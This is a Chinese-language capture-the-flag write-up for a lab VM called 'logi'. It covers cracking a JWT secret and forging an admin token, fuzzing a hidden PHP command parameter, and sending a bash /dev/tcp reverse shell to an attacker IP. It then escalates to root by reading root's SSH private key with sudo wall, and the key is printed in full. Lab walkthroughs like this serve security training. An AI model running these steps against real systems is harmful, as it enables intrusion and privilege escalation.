![logi[MazeSec]](https://gitlab.com/aristorechina/blog_imgur/-/raw/main/2025/ctf_writeup_cover_2dcbf3013efda15f.gif)
信息收集
cmd
┌──(root㉿kali)-[~]└─# arp-scan -l | grep PCS192.168.31.194 08:00:27:18:03:eb PCS Systemtechnik GmbH ┌──(root㉿kali)-[~]└─# IP=192.168.31.194 cmd
┌──(root㉿kali)-[~]└─# nmap -sV -sC -A $IP -PnStarting Nmap 7.95 ( https://nmap.org ) at 2025-09-30 14:25 EDTNmap scan report for logi (192.168.31.194)Host is up (0.0017s latency).Not shown: 998 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)| ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)80/tcp open http Apache httpd 2.4.62 ((Debian))|_http-title: TI15 AME\xE5\x8A\xA9\xE5\xA8\x81|_http-server-header: Apache/2.4.62 (Debian)MAC Address: 08:00:27:18:03:EB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Device type: general purposeRunning: Linux 4.X|5.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTEHOP RTT ADDRESS1 1.65 ms logi (192.168.31.194) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds先看看首页有啥
cmd
┌──(root㉿kali)-[~]└─# curl -s $IP ...<!--ame:jiayouachunyu-->目录扫描
cmd
┌──(root㉿kali)-[~]└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.31.194[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.6[+] Extensions: zip,shtml,php,php3,tar,gz,txt,html,bk,bak[+] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/.php (Status: 403) [Size: 278]/index.html (Status: 200) [Size: 3281]/.html (Status: 403) [Size: 278]/user (Status: 200) [Size: 2170]/user.php (Status: 200) [Size: 2170]/admin (Status: 200) [Size: 1576]/admin.php (Status: 200) [Size: 1576]/.html (Status: 403) [Size: 278]/.php (Status: 403) [Size: 278]/server-status (Status: 403) [Size: 278]Progress: 2426160 / 2426171 (100.00%)===============================================================Finished===============================================================用 ame:jiayouachunyu 登录进 user.php 了,拿到 jwt
text
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTI1NzEwMywiZXhwIjoxNzU5MjYwNzAzLCJzdWIiOiJhbWUiLCJyb2xlIjoidXNlciJ9.iMbyjqjyjHxyQlTLdU8KmYdq7WlfnFQbQleI8-8lLpE用 jwt_tool 爆破 jwt
cmd
┌──(kali㉿kali)-[~/Desktop/jwt_tool]└─$ python jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTIxNDAwNSwiZXhwIjoxNzU5MjE3NjA1LCJzdWIiOiJhbWUiLCJyb2xlIjoidXNlciJ9.3_7R14x70FFFh6OI43EOvm31WwHKtQmS7s-hUdm7y1g -C -d "/usr/share/wordlists/rockyou.txt" \ \ \ \ \ \ \__ | | \ |\__ __| \__ __| | | | \ | | | \ \ | | \ | | | __ \ __ \ | \ | _ | | | | | | | | | | / \ | | | | | | | |\ | / \ | | |\ |\ | | \______/ \__/ \__| \__| \__| \______/ \______/ \__| Version 2.3.0 \______| @ticarpi /home/kali/.jwt_tool/jwtconf.iniOriginal JWT: [+] nevergiveup is the CORRECT key!You can tamper/fuzz the token contents (-T/-I) and sign it using:python3 jwt_tool.py [options here] -S hs256 -p "nevergiveup"得到密钥 nevergiveup
在 JSON Web Tokens 解析发现 payload 是:
json
{ "iss": "moban", "iat": 1759257103, "exp": 1759260703, "sub": "ame", "role": "user"}修改为:
json
{ "iss": "moban", "iat": 1759257103, "exp": 1759260703, "sub": "ame", "role": "admin"}然后重新编码得到:
text
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJtb2JhbiIsImlhdCI6MTc1OTI1NzEwMywiZXhwIjoxNzU5MjYwNzAzLCJzdWIiOiJhbWUiLCJyb2xlIjoiYWRtaW4ifQ.LeStfNXO7i1_t7bhnHM7HL0uqMUoKC56XxQy3xkcjhQ浏览器改一下 cookie 就进去了
html
<!doctype html><html lang="zh-CN"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,initial-scale=1"> <title>Admin Area</title> <style> body{font-family:Segoe UI,Microsoft Yahei,Arial;background:#071029;color:#e6eef8;padding:30px} .card{max-width:900px;margin:30px auto;padding:20px;background:#081428;border-radius:8px} .btn{display:inline-block;padding:8px 12px;border-radius:6px;background:#1e90ff;color:#fff;text-decoration:none} .notice{color:#9fb0cc;margin-top:8px} </style></head><body><div class="card"> <h2>欢迎 — 管理员</h2> <p>你好,ame。你的身份已通过验证。</p> <div style="margin:16px 0;padding:12px;background:#061226;border-radius:6px"> <p><strong>karsakarsa369.php</strong></p> <p>https://www.jwt.io/</p> </div></div></body></html>根据提示来到 $IP/karsakarsa369.php
cmd
┌──(root㉿kali)-[~]└─# curl -s $IP/karsakarsa369.phpfuzz提示说要 fuzz
cmd
┌──(root㉿kali)-[~]└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/karsakarsa369.php?FUZZ=test -fs 4 -c /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev________________________________________________ :: Method : GET :: URL : http://192.168.31.194/karsakarsa369.php?FUZZ=test :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response size: 4________________________________________________ :: Progress: [220559/220559] :: Job [1/1] :: 2040 req/sec :: Duration: [0:01:43] :: Errors: 0 ::换了几个字典都没扫出来,猜测可能已经执行成功了只是没回显,试试看时间盲注
cmd
┌──(root㉿kali)-[~]└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u "http://$IP/karsakarsa369.php?FUZZ=sleep(5)%3b" -mt '>4000' -timeout 10 -t 40 -c /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.1.0-dev________________________________________________ :: Method : GET :: URL : http://192.168.31.194/karsakarsa369.php?FUZZ=sleep(5)%3b :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response time: >4000________________________________________________ cmd [Status: 200, Size: 4, Words: 1, Lines: 1, Duration: 5013ms]:: Progress: [220559/220559] :: Job [1/1] :: 8000 req/sec :: Duration: [0:01:30] :: Errors: 0 ::扫出来参数 cmd 了,写个反弹 shell
一开始用 system 函数被拦了,看看被 ban 了哪些函数
cmd
┌──(root㉿kali)-[~]└─# curl -g "http://$IP/karsakarsa369.php?cmd=print_r(ini_get('disable_functions'));"fuzzsystem,passthru,shell_exec,proc_open,pcntl_exec,dlexec 没被 ban,就它了
cmd
┌──(root㉿kali)-[~]└─# curl -g "http://$IP/karsakarsa369.php?cmd=exec(%22bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/192.168.31.58/4444%200%3E%261'%22);" ┌──(root㉿kali)-[~]└─# nc -lvnp 4444listening on [any] 4444 ...connect to [192.168.31.58] from (UNKNOWN) [192.168.31.194] 59080bash: cannot set terminal process group (417): Inappropriate ioctl for devicebash: no job control in this shellwww-data@logi:/var/www/html$ ididuid=33(www-data) gid=33(www-data) groups=33(www-data)稳定 shell
text
Ctrl + Zstty raw -echo; fgreset xtermexport TERM=xtermexport SHELL=/bin/bash横向移动
查看最近修改的文件
cmd
www-data@logi:/var/www/html$ find /var -type f -printf '%T@ %TY-%Tm-%Td %TH:%TM %p\n' 2>/dev/null | sort -nr | head -n 100 | cut -d' ' -f2-...2025-09-28 10:47 /var/backups/passwd...疑似密码文件
cmd
www-data@logi:/var/www/html$ cat /var/backups/passwdxiangwozheyangderen尝试登录 ame
cmd
www-data@logi:/var/www/html$ su amePassword: ame@logi:/var/www/html$ iduid=1000(ame) gid=1000(ame) groups=1000(ame)提权
列出当前用户允许通过 sudo 执行的命令
cmd
ame@logi:~$ sudo -lMatching Defaults entries for ame on logi: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\://sbin\:/usr/bin\:/sbin\:/bin User ame may run the following commands on logi: (ALL) NOPASSWD: /usr/bin/wall查询 wall | GTFOBins 发现可用于提权
The textual file is dumped on the current TTY (neither to
stdoutnor tostderr).If the binary is allowed to run as superuser by
sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.LFILE=file_to_read
sudo wall —nobanner “$LFILE”
bash
ame@logi:~$ sudo wall --nobanner "/root/.ssh/id_rsa"ame@logi:~$ 然而这里却没有输出,这是因为 wall 命令的功能不是将内容输出到当前的 shell,而是将消息“广播”给所有当前登录到系统的用户的终端(TTY)
当前所在的 www-data -> su ame 的会话是一个反弹 shell,这种 shell 不被系统视为一个标准的、交互式的登录终端(TTY),它本质上只是一个 socket 重定向了 /bin/bash 的输入输出流,因此当 wall 命令执行时反弹 shell 不在广播目标列表里
通过 ssh 登录再执行就好了
cmd
┌──(root㉿kali)-[~]└─# ssh ame@$IPThe authenticity of host '192.168.31.194 (192.168.31.194)' can't be established.ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.This host key is known by the following other names/addresses: ~/.ssh/known_hosts:2: [hashed name] ~/.ssh/known_hosts:4: [hashed name]Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.31.194' (ED25519) to the list of known hosts.ame@192.168.31.194's password: Linux logi 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.Last login: Sun Sep 28 10:35:26 2025 from 172.20.10.11ame@logi:~$ sudo wall --nobanner "/root/.ssh/id_rsa" -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn NhAAAAAwEAAQAAAgEAnaT0B+kb64e8z3am+GYUeZQ91emxMpRnMWpP0kh3fZCoBJFf5PNX m6U1vZ33KCr84+gPmwaSzbw6YooQ87sFGosSwHSM/qp4zio8/PCHJicFgSxb+VFNdWu4gG VbfU12OMnAlIktH8HPr53z3UzaltGubxPxAm55i2XOAu2mXvZQ7KJpD7ONM1l02oCp24zZ dh3zIomqaEslfFEQz3TEkMhVxUBi7MIGM9khrrmbsZUthKQW1/hGm9hle9tFOeWtBVdMpk zKRrgrNfEHMQ3gviNesmmvxKCTCmxTt0D37sFrE9qW9f3ZxSclXBNLEfNd66VtYhalvJdP nKIIh6dN1FCyzGtn9U+vKc4uT2Zz9cEh8gmbEZbCUTmQX+LPMcCzuDTZpUY783zMNiYo1Y vFaW2Nk0SWcdP1Q+wo2w6BSW9cjYSFwLkikVEIwxZ98J9mFLasEzAw4bQ2gSq1QxabjvWh g8+w1U6nyBgcKmtY4mPi1kWu4Yq88JYsRLcTOl+CamSMPbwA6r5XKDgDaVPVrwqN4ix+dc sNJFnlSgS/gfT/MQUuXE5/Tm2I4S6JoPsBlqaKsZvGz3U21HMQV0fA5CV0PVwvPBn2C+SB 2EwSNfSGp3lEL1q0/UHy+Y0awsDOizhWxb/2TLsawf0OQgLykxyCbxr8E9aazVZ8mMJ9t4 EAAAdA5YGAIuWBgCIAAAAHc3NoLXJzYQAAAgEAnaT0B+kb64e8z3am+GYUeZQ91emxMpRn MWpP0kh3fZCoBJFf5PNXm6U1vZ33KCr84+gPmwaSzbw6YooQ87sFGosSwHSM/qp4zio8/P CHJicFgSxb+VFNdWu4gGVbfU12OMnAlIktH8HPr53z3UzaltGubxPxAm55i2XOAu2mXvZQ 7KJpD7ONM1l02oCp24zZdh3zIomqaEslfFEQz3TEkMhVxUBi7MIGM9khrrmbsZUthKQW1/ hGm9hle9tFOeWtBVdMpkzKRrgrNfEHMQ3gviNesmmvxKCTCmxTt0D37sFrE9qW9f3ZxScl XBNLEfNd66VtYhalvJdPnKIIh6dN1FCyzGtn9U+vKc4uT2Zz9cEh8gmbEZbCUTmQX+LPMc CzuDTZpUY783zMNiYo1YvFaW2Nk0SWcdP1Q+wo2w6BSW9cjYSFwLkikVEIwxZ98J9mFLas EzAw4bQ2gSq1QxabjvWhg8+w1U6nyBgcKmtY4mPi1kWu4Yq88JYsRLcTOl+CamSMPbwA6r 5XKDgDaVPVrwqN4ix+dcsNJFnlSgS/gfT/MQUuXE5/Tm2I4S6JoPsBlqaKsZvGz3U21HMQ V0fA5CV0PVwvPBn2C+SB2EwSNfSGp3lEL1q0/UHy+Y0awsDOizhWxb/2TLsawf0OQgLykx yCbxr8E9aazVZ8mMJ9t4EAAAADAQABAAACACjO25D0qhKVZ6341A43NpOmaT9nqEQkoHXt RE52DeCGQsgz7bPxvjr/UGMOcj2Gq0I//1ItKHFziVWa0fqV7iNJ3wfM4/bEoFMWIgWEKi gZL9aZahGnFzsPMIqkMkPEepcGuwB4ZiLzY9TdOZSO4YLrMpF0gw4TFQmdx++AH3Izpw0q mbHD1Ah33sT1S4MW+fAWnqrRIjivQzvkLErXuk6UXYebPEB3lW10hsCZMZGNwWO1qmgrz/ Nl2Bdw0oHDT7+zMpdWB4K5CA6Fn0v2gLgXpdrfeu2Wd5naIu2sNsIqdZKFIlD5bpcXpBcq s2MpMaXfg+pBXJPuQ2CTnUuoZn/ohgAdRZWBRhz3BPAdj20YDZB1FR8d7gm8wuprr51t0y Qu3liLLv7utHZ6twV+twHEtLZcfk4u5nK5eUhdUQv7KnRjmO51XD0vgT9sJcdvrCo/EroU 1bErEML7Jx08s5d6veWyCaw0P9hxSYqWA/8sn+cBA4nRio4f835u42DL+asE8vvPpJgs+p SxZlTCc5j362BpB/r6tXbt5/gVcAlY7eG9Mi0XQE6MrRVFPHvjj4aVrJoahAvuTSCOwKSr DuGas5MsupLXtsvnQ+OLXoLfmau9dJkwceV9boMWijy/GUjq2PuXMzZCIzGdke0tM2CDzl XtnMsZxZlM0I2hbKQVAAABAQCbUliOaBlCdEsZ/uhF3+QP/+KepMQt5E2XCyZmEKbdvVXI BU5DfJidd00juWV25gS+JeKJ5AmGcJMJZxzFNmcb4S08ydUxs5J0BuYJLlT7Hl8Wx+cv7C xuI69zfVKrEuXu54kfkUmn6M5Aq+VlAvAms8IS67jbVKf/V2pKvT9cd/dGK+A5YVihGxeT 9ST8g3S/+FviJeyjuMK8WGYh6774LvlRufzvxBRevdO/zVKH2DAFLEWGEFkt9TEGS3MDri gMAnF9in23bJ3ksoEQjhcafQL+UXGalUTKWmbwEfvuXtX48j7a4G/0ejBbChKQdRLd2n7O +6hRr97q9jur4V8bAAABAQDJegrTfveMpUcwV9S9/PHjaq9YD1WvUSXMjOGGrGZyvg/czz GDbb+G/NqojFFoswqQ8nl3yw9yOiHvanHLAdLyG/xB76X07cupVHnY+N+M5dAlXDYpE0bq P3XVWOGRz55ZJ+ylI3DKmGseqcAKVJNhc9B0ZzgpyYDjAldbngiHilV+7JxCIXzxN2GhAA UyQLAFBQ54UKMdrJtAQOXBvSZgZ06ZmDqqC0Z/+YTlZ8Jyezl5le4yG42ilSYal/E+W1sc 9Bmz3QFyvSP5pqTKy0/xfvr6RO9LJbt6i5mME+V7VV77HkW7O11qFF2w2p/zOjXpyXM81N ueXYKFdXSQuPw/AAABAQDITkel25RoCYjYRG/oE2G7qcMwdUrVsas5o0cXdhav3oot121T Hfdk1d+ZmHgJ9GEwnn630xXEbKfpRxkNRhJN5MCNELGpMyY0PrTuT1Z+eajhsjtoFjIJ3y veWG/EMR1oeDIUfD8zIdZ9xTsUL3Z9iS3aLL5prq0+byOCVQr7WQyiK/SNMmF6sRTNFHhy CTJ0i6yKFl+EEcG2O0KyGWNeCjXhmxOaM4J1SLXemfPmYLKJPjlp9+/suJrOVZwrLLJe5w 3g0lGOKdY/B+KeiRBh7+rM4s+n0LfG5AZWztTNBn1I8nI5Ox3VV2Xml+EHlA/jzgISDTGh yFwO2nf1b1w/AAAACXJvb3RAbG9naQE= -----END OPENSSH PRIVATE KEY-----把私钥保存到一个攻击机上(我这里命名为 id_rsa_logi),清理掉每行末尾的空格和制表符后使用私钥登录
cmd
┌──(root㉿kali)-[/home/kali/Desktop]└─# sed -i 's/[ \t]*$//' id_rsa_logi ┌──(root㉿kali)-[/home/kali/Desktop]└─# chmod 600 id_rsa_logi ┌──(root㉿kali)-[/home/kali/Desktop]└─# ssh -i id_rsa_logi root@$IP Linux logi 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.Last login: Mon Sep 29 07:40:55 2025 from ::1root@logi:~# iduid=0(root) gid=0(root) groups=0(root)text
root@logi:~# cat /home/ame/user.txtuser:{niudexiongdiniude}root@logi:~# cat /root/provemyself.txtroot{xiangrootzheyangderen}